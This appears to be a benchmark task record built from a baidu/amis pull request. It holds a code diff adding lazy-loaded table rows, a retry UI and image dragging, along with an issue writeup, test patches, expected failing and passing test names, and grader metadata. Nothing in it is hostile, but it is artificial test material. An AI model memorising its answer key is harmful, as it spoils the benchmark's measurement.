+ })); break; case ImageActionKey.ROTATE_RIGHT: - this.setState(prevState => ({rotate: prevState.rotate + 90})); + this.setState(prevState => ({ + rotate: prevState.rotate + 90, + tx: 0, + ty: 0 + })); break; case ImageActionKey.ZOOM_IN: - this.setState(prevState => ({scale: prevState.scale + 0.5})); + this.setState(prevState => ({ + scale: prevState.scale + 0.5, + tx: 0, + ty: 0 + })); break; case ImageActionKey.ZOOM_OUT: this.setState(prevState => { return prevState.scale - 0.5 > 0 - ? {scale: prevState.scale - 0.5} + ? {scale: prevState.scale - 0.5, tx: 0, ty: 0} : null; }); break; case ImageActionKey.SCALE_ORIGIN: - this.setState(() => ({scale: 1})); + this.setState(() => ({scale: 1, tx: 0, ty: 0})); break; } @@ -280,6 +340,8 @@ export class ImageGallery extends React.Component< items, rotate, scale, + tx, + ty, showToolbar, enlargeWithGallary, actions, @@ -320,8 +382,11 @@ export class ImageGallery extends React.Component< ref={this.galleryMainRef} > <img + draggable={false} src={items[index].originalSrc} - style={{transform: `scale(${scale}) rotate(${rotate}deg)`}} + style={{ + transform: `translate(${tx}px, ${ty}px) scale(${scale}) rotate(${rotate}deg)` + }} /> {showToolbar && Array.isArray(actions) && actions.length > 0 diff --git a/packages/amis-ui/src/components/Tree.tsx b/packages/amis-ui/src/components/Tree.tsx index 5766cbf71..047bf6c93 100644 --- a/packages/amis-ui/src/components/Tree.tsx +++ b/packages/amis-ui/src/components/Tree.tsx @@ -37,6 +37,7 @@ import {LocaleProps, localeable} from 'amis-core'; import Spinner, {SpinnerExtraProps} from './Spinner'; import {ItemRenderStates} from './Selection'; import VirtualList from './virtual-list'; +import TooltipWrapper from './TooltipWrapper'; interface IDropIndicator { left: number; @@ -1275,33 +1276,42 @@ export class TreeSelector extends React.Component< !(item.defer && !item.loaded) ? ( <div className={cx('Tree-item-icons')}> {creatable && hasAbility(item, 'creatable') ? ( - <a - onClick={this.handleAdd.bind(this, item)} - data-tooltip={__(createTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(createTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="plus" className="icon" /> - </a> + <a onClick={this.handleAdd.bind(this, item)}> + <Icon icon="plus" className="icon" /> + </a> + </TooltipWrapper> ) : null} {removable && hasAbility(item, 'removable') ? ( - <a - onClick={this.handleRemove.bind(this, item)} - data-tooltip={__(removeTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(removeTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="minus" className="icon" /> - </a> + <a onClick={this.handleRemove.bind(this, item)}> + <Icon icon="minus" className="icon" /> + </a> + </TooltipWrapper> ) : null} {editable && hasAbility(item, 'editable') ? ( - <a - onClick={this.handleEdit.bind(this, item)} - data-tooltip={__(editTip)} - data-position="left" + <TooltipWrapper + placement={'bottom'} + tooltip={__(editTip)} + trigger={'hover'} + tooltipTheme="dark" > - <Icon icon="new-edit" className="icon" /> - </a> + <a onClick={this.handleEdit.bind(this, item)}> + <Icon icon="new-edit" className="icon" /> + </a> + </TooltipWrapper> ) : null} </div> ) : null} diff --git a/packages/amis-ui/src/locale/de-DE.ts b/packages/amis-ui/src/locale/de-DE.ts index 2e687fabe..0d685fb5a 100644 --- a/packages/amis-ui/src/locale/de-DE.ts +++ b/packages/amis-ui/src/locale/de-DE.ts @@ -197,6 +197,8 @@ register('de-DE', { 'Options.editLabel': 'Bearbeiten {{label}}', 'Options.label': 'Option', 'Options.createFailed': 'Erstellen fehlgeschlagen', + 'Options.retry': + "Laden fehlgeschlagen '{{reason}}', klicken Sie auf Wiederholen", 'placeholder.empty': '<Empty>', 'placeholder.enter': 'Eingabe', 'placeholder.noData': 'Keine Daten', diff --git a/packages/amis-ui/src/locale/en-US.ts b/packages/amis-ui/src/locale/en-US.ts index 605c4884f..481361a3b 100644 --- a/packages/amis-ui/src/locale/en-US.ts +++ b/packages/amis-ui/src/locale/en-US.ts @@ -189,6 +189,7 @@ register('en-US', { 'Options.editLabel': 'Edit {{label}}', 'Options.label': 'option', 'Options.createFailed': 'create failed, please check', + 'Options.retry': "Loading failed '{{reason}}', click retry", 'placeholder.empty': '<Empty>', 'placeholder.enter': 'Enter', 'placeholder.noData': 'No data', diff --git a/packages/amis-ui/src/locale/zh-CN.ts b/packages/amis-ui/src/locale/zh-CN.ts index ccea50181..95e19b697 100644 --- a/packages/amis-ui/src/locale/zh-CN.ts +++ b/packages/amis-ui/src/locale/zh-CN.ts @@ -194,6 +194,7 @@ register('zh-CN', { 'Options.editLabel': '编辑{{label}}', 'Options.label': '选项', 'Options.createFailed': '新增失败,请仔细检查', + 'Options.retry': '加载失败「{{reason}}」,点击重试', 'placeholder.empty': '<空>', 'placeholder.enter': '请输入', 'placeholder.noData': '暂无数据', diff --git a/packages/amis/src/renderers/CRUD.tsx b/packages/amis/src/renderers/CRUD.tsx index d453d176b..a140cf8d3 100644 --- a/packages/amis/src/renderers/CRUD.tsx +++ b/packages/amis/src/renderers/CRUD.tsx @@ -132,6 +132,11 @@ export interface CRUDCommonSchema extends BaseSchema, SpinnerExtraProps { */ api?: SchemaApi; + /** + * 懒加载 API,当行数据中用 defer: true 标记了,则其孩子节点将会用这个 API 来拉取数据。 + */ + deferApi?: SchemaApi; + /** * 批量操作 */ diff --git a/packages/amis/src/renderers/Table/Cell.tsx b/packages/amis/src/renderers/Table/Cell.tsx index 293974224..9da470971 100644 --- a/packages/amis/src/renderers/Table/Cell.tsx +++ b/packages/amis/src/renderers/Table/Cell.tsx @@ -9,7 +9,7 @@ import { buildTrackExpression, evalTrackExpression } from 'amis-core'; -import {BadgeObject, Checkbox, Icon} from 'amis-ui'; +import {BadgeObject, Checkbox, Icon, Spinner} from 'amis-ui'; import React from 'react'; export interface CellProps extends ThemeProps { @@ -32,6 +32,7 @@ export interface CellProps extends ThemeProps { popOverContainer?: any; quickEditFormRef: any; onImageEnlarge?: any; + translate: (key: string, ...args: Array<any>) => string; } export default function Cell({ @@ -51,7 +52,8 @@ export default function Cell({ onDragStart, popOverContainer, quickEditFormRef, - onImageEnlarge + onImageEnlarge, + translate: __ }: CellProps) { if (column.name && item.rowSpans[column.name] === 0) { return null; @@ -134,7 +136,18 @@ export default function Cell({ /> ); prefix.push( - item.expandable ? ( + item.loading ? ( + <Spinner key="loading" size="sm" show /> + ) : item.error ? ( + <a + className={cx('Table-retryBtn')} + key="retryBtn" + onClick={item.resetDefered} + data-tooltip={__('Options.retry', {reason: item.error})} + > + <Icon icon="retry" className="icon" /> + </a> + ) : item.expandable ? ( <a key="expandBtn2" className={cx('Table-expandBtn2', item.expanded ? 'is-active' : '')} @@ -169,7 +182,13 @@ export default function Cell({ ); } return [prefix, affix, addtionalClassName]; - }, [item.expandable, item.expanded, column.isPrimary]); + }, [ + item.expandable, + item.expanded, + item.error, + item.loading, + column.isPrimary + ]); // 根据条件缓存 data,避免孩子重复渲染 const hasCustomTrackExpression = diff --git a/packages/amis/src/renderers/Table/TableRow.tsx b/packages/amis/src/renderers/Table/TableRow.tsx index 388dc063e..83434f74c 100644 --- a/packages/amis/src/renderers/Table/TableRow.tsx +++ b/packages/amis/src/renderers/Table/TableRow.tsx @@ -60,6 +60,8 @@ export class TableRow extends React.PureComponent< depth: number; expandable: boolean; appeard?: boolean; + loading?: boolean; + error?: string; checkdisable: boolean; trRef?: React.Ref<any>; isNested?: boolean; @@ -362,6 +364,8 @@ export default observer((props: TableRowProps) => { depth={item.depth} expandable={item.expandable} checkdisable={item.checkdisable} + loading={item.loading} + error={item.error} // data 在 TableRow 里面没有使用,这里写上是为了当列数据变化的时候 TableRow 重新渲染, // 不是 item.locals 的原因是 item.locals 会变化多次,比如父级上下文变化也会进来,但是 item.data 只会变化一次。 data={canAccessSuperData ? item.locals : item.data} diff --git a/packages/amis/src/renderers/Table/index.tsx b/packages/amis/src/renderers/Table/index.tsx index 59f43d2d6..cee5ca66d 100644 --- a/packages/amis/src/renderers/Table/index.tsx +++ b/packages/amis/src/renderers/Table/index.tsx @@ -7,7 +7,8 @@ import { SchemaExpression, position, animation, - evalExpressionWithConditionBuilder + evalExpressionWithConditionBuilder, + isEffectiveApi } from 'amis-core'; import {Renderer, RendererProps} from 'amis-core'; import {SchemaNode, ActionObject, Schema} from 'amis-core'; @@ -71,6 +72,7 @@ import ColGroup from './ColGroup'; import debounce from 'lodash/debounce'; import AutoFilterForm from './AutoFilterForm'; import Cell from './Cell'; +import {reaction} from 'mobx'; /** * 表格列,不指定类型时默认为文本类型。 @@ -343,6 +345,11 @@ export interface TableSchema extends BaseSchema { * table layout */ tableLayout?: 'fixed' | 'auto'; + + /** + * 懒加载 API,当行数据中用 defer: true 标记了,则其孩子节点将会用这个 API 来拉取数据。 + */ + deferApi?: SchemaApi; } export interface TableProps extends RendererProps, SpinnerExtraProps { @@ -640,6 +647,18 @@ export default class Table extends React.Component<TableProps, object> { formItem && isAlive(formItem) && formItem.setSubStore(store); Table.syncRows(store, this.props, undefined) && this.syncSelected(); + + this.toDispose.push( + reaction( + () => + store + .getExpandedRows() + .filter( + row => row.defer && !row.loaded && !row.loading && !row.error + ), + (rows: Array<IRow>) => rows.forEach(this.loadDeferredRow) + ) + ); } static syncRows( @@ -711,6 +730,34 @@ export default class Table extends React.Component<TableProps, object> { } } + @autobind + async loadDeferredRow(row: IRow) { + const {env} = this.props; + const deferApi = row.data.deferApi || this.props.deferApi; + + if (!isEffectiveApi(deferApi)) { + throw new Error('deferApi is required'); + } + + try { + row.markLoading(true); + + const response = await env.fetcher(deferApi, row.locals); + if (!response.ok) { + throw new Error(response.msg); + } + + row.setDeferData(response.data); + row.markLoaded(true); + row.setError(''); + } catch (e) { + row.setError(e.message); + env.notify('error', e.message); + } finally { + row.markLoading(false); + } + } + /** * 自动设置表格高度占满界面剩余区域 * 用 css 实现有点麻烦,要改很多结构,所以先用 dom hack 了,避免对之前的功能有影响 @@ -2024,7 +2071,8 @@ export default class Table extends React.Component<TableProps, object> { checkOnItemClick, popOverContainer, canAccessSuperData, - itemBadge + itemBadge, + translate } = this.props; return ( @@ -2047,6 +2095,7 @@ export default class Table extends React.Component<TableProps, object> { popOverContainer={this.getPopOverContainer} quickEditFormRef={this.subFormRef} onImageEnlarge={this.handleImageEnlarge} + translate={translate} /> ); }
fix: 处理input-number单位选项交互;input-table展示列配置项位置处理 & progress组件配置面板去除模版配置项 feat:组件状态支持"可见"配置项 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 3514f38</samp> This pull request updates and improves the schema templates for editing various `amis` components in the `amis-editor`. It adds the `visible` property to some components, reorganizes the `table` component options, adds the unit options for the `input-number` component, and removes some unsupported or redundant properties. It also fixes some compatibility and internationalization issues. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 3514f38</samp> > _Some schema templates were added or removed_ > _To make `amis` components improved_ > _The `visible` property was made consistent_ > _The `valueTpl` option became nonexistent_ > _And some options were repositioned or moved_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 3514f38</samp> * Add a schema template for the `visible` property to various components, using the `common` file ([link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-851dba93506fd34484adaa1d720285d572d18ca4392a0c4893fca27c4159fa92R256), [link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-09783eec140bf3c70e8dd5932d5b8108bd6777cd334ea0a27322d0f09586de29L381-R381), [link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-6a2f7c2cc26a108293bdd2d7ca6ca8d6b06acbf8e2d17424a50526d6affa6f67L276-R276), [link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-a4359e1efbe3c320ab402ee14a9fa73386e3da07b3f27049dcbc13a91c314c05L795-R795), [link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-a4359e1efbe3c320ab402ee14a9fa73386e3da07b3f27049dcbc13a91c314c05L881-L891)) * Modify the schema template for the `NumberControlPlugin` in `InputNumber.tsx`, adding a new option for unit options and using the `i18nEnabled` variable ([link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-c459de2eb5b316e5e49ab103c7fa1a03c20cf7693bd79b8e039e782b48c5731aL226-R264)) * Reorganize the schema template for the `TableControlPlugin` in `InputTable.tsx`, moving the `columnsTogglable` property and adding the `affixHeader` property ([link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-01999eae047ec7fdb8502c22801699d39f7a54c994a9414462c0fbe21634ecd8L1007-R1007), [link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-01999eae047ec7fdb8502c22801699d39f7a54c994a9414462c0fbe21634ecd8R1040-R1076)) * Remove the schema template for the `valueTpl` property from the `ProgressPlugin` in `Progress.tsx`, as it is not supported by the `progress` component ([link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-6ddce7589047fa0b03657030e041891a72416ebd3a417d35e6006b8428cae731L95-L114)) * Remove the schema template for the `keyValueMapControl` property from the `options` file, as it is replaced by the `combo-container` type ([link](https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-4ff8190ccb19edb2d788deb7ebf73420c1799a07d6061d2aeb89ab77e9e66b95L742-L751))
**Title** Add lazy‑load support for nested tables/CRUD and related UX, schema, and utility updates **Problem** Nested tables in the CRUD component could not load child rows on demand, leaving users unable to view deep data without pre‑loading everything. The editor also lacked a consistent “visible” control and unit option handling for number inputs, and the text‑replacement utility only accepted an array of ignored keys, limiting flexibility. **Root Cause** The table store and row models were not designed to flag deferred rows or trigger asynchronous loading, and the schema templates missed the “visible” field and unit options. The replace‑text helper’s API was too restrictive, and API calls never carried a request‑context payload. **Fix / Expected Behavior** - Introduce a `deferApi` attribute for CRUD/Table to fetch children of rows marked with `defer: true`. - Extend row state with loading, error, and deferred‑data flags; automatically request missing children when expanded. - Show a spinner while loading and a retry button with tooltip on failure. - Update documentation to describe nested data, lazy loading, and the new `deferApi` property. - Add a unified “visible” schema template and expose it in relevant component editors. - Provide a combo control for number‑input unit options. - Allow `replaceTextIgnoreKeys` to be a function (or array) for more granular key exclusion. - Inject the current data context into every API request (`api.context`). - Minor style tweaks for image gallery dragging, table toolbar shadows, and tooltip placement. - Remove unsupported `valueTpl` from the progress component. **Risk & Validation** - Verify that expanding a deferred row triggers a single API call and correctly populates child rows without duplicate requests. - Ensure the spinner, retry UI, and tooltip display correctly across themes and do not interfere with existing table interactions. - Run the suite of editor schema tests to confirm the new “visible” and unit‑option configurations render and persist as expected. - Test replace‑text functionality with both array and function ignore definitions to confirm no regression.
8,515
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index fb30171c4..32d23b1e5 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -580,3 +580,9 @@ test('evalute:namespace', () => { expect(evaluate('${ls: &["c"]["c"]}', {})).toMatchObject({d: 4}); expect(evaluate('${ls: &["c"][key]}', {})).toMatchObject({d: 4}); }); + +test('evalute:speical characters', () => { + // 优先识别成位运算,而不是过滤器 + expect(evaluate('${1 | 2}', {})).toBe(3); + expect(evaluate('${1 | abc}', {abc: 2})).toBe(3); +}); diff --git a/packages/amis-formula/__tests__/lexer.test.ts b/packages/amis-formula/__tests__/lexer.test.ts index 773032b1d..e431f3d24 100644 --- a/packages/amis-formula/__tests__/lexer.test.ts +++ b/packages/amis-formula/__tests__/lexer.test.ts @@ -31,13 +31,19 @@ test('lexer:simple', () => { test('lexer:filter', () => { expect( getTokens('\\$abc is ${abc | date: YYYY-MM-DD HH\\:mm\\:ss}', { - evalMode: false + evalMode: false, + filters: { + date() {} + } }) ).toMatchSnapshot(); expect( getTokens('\\$abc is ${abc | isTrue : trueValue : falseValue}', { - evalMode: false + evalMode: false, + filters: { + isTrue() {} + } }) ).toMatchSnapshot(); }); @@ -55,7 +61,10 @@ test('lexer:exception', () => { expect(() => getTokens('${a | filter: \\x2}', { - evalMode: false + evalMode: false, + filters: { + filter() {} + } }) ).toThrow('Unexpected token x in 1:17'); }); diff --git a/packages/amis-formula/__tests__/parser.test.ts b/packages/amis-formula/__tests__/parser.test.ts index fa87d1fbb..4c618fa1f 100644 --- a/packages/amis-formula/__tests__/parser.test.ts +++ b/packages/amis-formula/__tests__/parser.test.ts @@ -1,3 +1,4 @@ +import moment from 'moment'; import {parse} from '../src/index'; test('parser:simple', () => { @@ -120,8 +121,12 @@ test('parser:filter', () => { test('parser:filter-escape', () => { expect( parse('\\$abc is ${abc | date: YYYY-MM-DD HH\\:mm\\:ss}', { - evalMode: false - }) + evalMode: false, + filters: { + date: (input: any, format = 'LLL', inputFormat = 'X') => + moment(input, inputFormat).format(format) + } + } as any) ).toMatchSnapshot(); }); diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap index b8200254f..c290dc232 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap @@ -100,6 +100,9 @@ exports[`Renderer:Form 2`] = ` "onSuccess": [Function], "successMessage": "saveSuccess", }, + "context": { + "a": "123", + }, "data": { "a": "123", }, diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap index 17485c66e..f26ffe567 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap @@ -204,6 +204,9 @@ exports[`Form:initData:remote 2`] = ` "onSuccess": [Function], "successMessage": undefined, }, + "context": { + "c": "123", + }, "method": "get", "query": { "c": "123", diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap index d87b14148..84cec19c7 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap @@ -2061,10 +2061,7 @@ exports[`Renderer:transfer follow left mode 1`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2100,10 +2097,7 @@ exports[`Renderer:transfer follow left mode 1`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2725,10 +2719,7 @@ exports[`Renderer:transfer follow left mode 2`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2764,10 +2755,7 @@ exports[`Renderer:transfer follow left mode 2`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" diff --git a/packages/amis/__tests__/renderers/Image.test.tsx b/packages/amis/__tests__/renderers/Image.test.tsx index 61389eec5..45192f014 100644 --- a/packages/amis/__tests__/renderers/Image.test.tsx +++ b/packages/amis/__tests__/renderers/Image.test.tsx @@ -216,12 +216,12 @@ describe('Renderer:image', () => { const imgIns = baseElement.querySelector('.cxd-ImageGallery-main img')!; expect(imgIns).toHaveStyle({ - transform: 'scale(1) rotate(0deg)' + transform: 'translate(0px, 0px) scale(1) rotate(0deg)' }); fireEvent.click(actions[1].firstElementChild!); expect(imgIns).toHaveStyle({ - transform: 'scale(1) rotate(90deg)' + transform: 'translate(0px, 0px) scale(1) rotate(90deg)' }); });
[ "evalute:speical characters" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "async-evalute:namespace", "evalute:keywords", "evalute:Math", "evalute:namespace", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Function: lexer(input: string, options?: LexerOptions) Location: packages/amis-formula/src/lexer.ts Inputs: - input string – the raw formula source. - options LexerOptions (optional) – may include `evalMode`, `variableMode`, `allowFilter`, and new fields `filters` (object of filter functions) and `isFilter` (function to test whether a name is a filter). When `isFilter` is omitted the function builds one from built‑in filters plus any provided via `options.filters`. Outputs: An array of Token objects representing the lexical stream. Throws on unexpected characters. The added `isFilter` handling allows the lexer to distinguish a pipe (`|`) used as a filter separator from a bitwise‑OR operator, which is exercised in the test “evalute:speical characters”. Function: getTokens(source: string, options?: GetTokensOptions) Location: packages/amis-formula/src/index.ts (exported from the package root) Inputs: - source string – the formula string to tokenise. - options object (optional) – may contain `evalMode` (boolean), `filters` (object mapping filter names to implementations), and other lexer flags. The `filters` field is now accepted and forwarded to the lexer so that filter names are recognised. Outputs: Token[] – the token list produced by `lexer`. The test adds a `filters` object to ensure filter names are known during tokenisation. Function: parse(source: string, options?: ParseOptions) Location: packages/amis-formula/src/index.ts Inputs: - source string – the formula to parse. - options object (optional) – may contain `evalMode`, `variables`, and now a `filters` property (object of filter functions). The parser forwards `filters` to the lexer so that filter names are correctly identified. Outputs: AST (abstract syntax tree) representation of the formula. The test supplies a `date` filter implementation, exercising the new `filters` field. Method: Table.loadDeferredRow(row: IRow) Location: packages/amis/src/renderers/Table/index.tsx (class Table) Inputs: - row IRow – a table row marked with `defer: true`. Outputs: void (internal async handling). The method fetches data via the configured `deferApi`, updates row state (`loading`, `loaded`, `error`, `data`), and emits notifications. This behaviour is exercised indirectly by the table’s lazy‑loading logic in the updated code. Function: initChildren(children: Array<any>, depth: number, pindex: number, parentId: string, path?: string): any Location: packages/amis-core/src/store/table.ts Inputs: - children Array<any> – raw child data. - depth number – current tree depth. - pindex number – index of the parent among its siblings. - parentId string – identifier of the parent row. - path string (optional) – dot‑separated path to this node. Outputs: Array of Row model instances with added fields `defer`, `loaded`, `loading`, `error` for lazy loading support. The test suite indirectly validates the new fields via table rendering checks. Function: Row.replaceChildren(children: Array<any>) Location: packages/amis-core/src/store/table.ts (model Row) Inputs: - children Array<any> – new child data for the row. Outputs: void – updates the row’s `children` collection, preserving parent references. Used by the lazy‑loading implementation. Method: Row.markLoading(value: any) Location: packages/amis-core/src/store/table.ts (model Row) Inputs: - value any – truthy to set `loading` flag. Outputs: void – sets the row’s `loading` state. Method: Row.markLoaded(value: any) Location: packages/amis-core/src/store/table.ts (model Row) Inputs: - value any – truthy to set `loaded` flag. Outputs: void – sets the row’s `loaded` state. Method: Row.setError(value: any) Location: packages/amis-core/src/store/table.ts (model Row) Inputs: - value any – error message string. Outputs: void – stores the error message on the row for UI display. Method: Row.resetDefered() Location: packages/amis-core/src/store/table.ts (model Row) Inputs: none Outputs: void – clears `error` and resets `loaded` to false, allowing a retry of lazy loading. This is exercised by the UI retry button tested via snapshot changes. Method: Row.setDeferData({children, ...rest}: any) Location: packages/amis-core/src/store/table.ts (model Row) Inputs: - object containing `children` array and other row data. Outputs: void – merges new data into the row, re‑initialises children via initChildren with proper lazy‑loading flags. Used when a deferred row’s data is loaded. Method: Table.syncRows(store, props, rows) Location: packages/amis/src/renderers/Table/index.tsx (static method) Inputs: - store ITableStore – the table store instance. - props TableProps – component props (now includes optional `deferApi`). - rows Array<any> (optional) – raw rows data. Outputs: boolean indicating whether rows were re‑initialised. The method now respects `defer` flags on rows and the new `deferApi` prop. Method: Table.syncSelected() Location: packages/amis/src/renderers/Table/index.tsx (instance method) Inputs: none (uses component state and store). Outputs: void – synchronises selected rows after data changes; unchanged but interacts with new row flags. Method: Table.render() Location: packages/amis/src/renderers/Table/index.tsx (React render method) Inputs: none. Outputs: JSX element. The render now passes the new `translate` prop to Cell for localisation of retry messages. Function: replaceText(schema: any, replaceText?: {[propName: string]: string}, replaceTextIgnoreKeys?: String[] | ((key:string,value:any,object:any)=>boolean)) Location: packages/amis-core/src/utils/replaceText.ts Inputs: - schema any – the schema to process. - replaceText object – mapping of placeholder strings to replacements. - replaceTextIgnoreKeys either an array of keys to ignore or a predicate function. Outputs: any – a deep‑cloned schema with text replaced, now supporting a functional ignore predicate as used in the test suite for custom replace‑text handling. Function: insertStyle(style: string, id: string, doc?: Document) Location: packages/amis-core/src/utils/style-helper.ts Inputs: - style string – CSS text. - id string – identifier; now prefixed with `"amis-"` internally. - doc Document (optional). Outputs: void – inserts or updates a style tag; the prefix change is verified by snapshot tests of rendering output. Function: removeCustomStyle(type: string, id: string, doc?: Document) Location: packages/amis-core/src/utils/style-helper.ts Inputs: - type string – optional style type. - id string – identifier; now prefixed with `"amis-"` internally. - doc Document (optional). Outputs: void – removes the style element. Method: Env.replaceTextIgnoreKeys handling Location: packages/amis-core/src/env.tsx (RendererEnv interface) Inputs: - replaceTextIgnoreKeys – can now be a function `(key, value, object) => boolean` in addition to a string array. Outputs: void – enables more flexible ignore logic, exercised by tests passing a function.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 38, "num_modified_lines": 1138, "pr_author": "yinchunyu", "pr_labels": [ "feat", "fix" ], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-851dba93506fd34484adaa1d720285d572d18ca4392a0c4893fca27c4159fa92R256", "https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-09783eec140bf3c70e8dd5932d5b8108bd6777cd334ea0a27322d0f09586de29L381-R381", "https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-6a2f7c2cc26a108293bdd2d7ca6ca8d6b06acbf8e2d17424a50526d6affa6f67L276-R276" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue clearly requests schema template updates (adding visible, unit options, table config changes) and the intent is well defined. However, the provided test patch modifies many unrelated test files (formula lexer, parser, UI snapshots, ImageGallery behavior, tree tooltips, etc.) which are not exercised by the described changes, indicating a coupling problem with the test suite. This misalignment suggests the primary problem is environment preparation rather than a solvable feature implementation.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests modify amis-formula lexer/parser unrelated to schema changes", "Snapshot updates for Image, Table, Tree components unrelated to the PR", "Added UI interaction tests (dragging, retry button) not covered by the issue" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
1bb988b942739d3f674260f578a69be4dfe659b9
2023-10-26 13:06:19
baidu__amis-8517
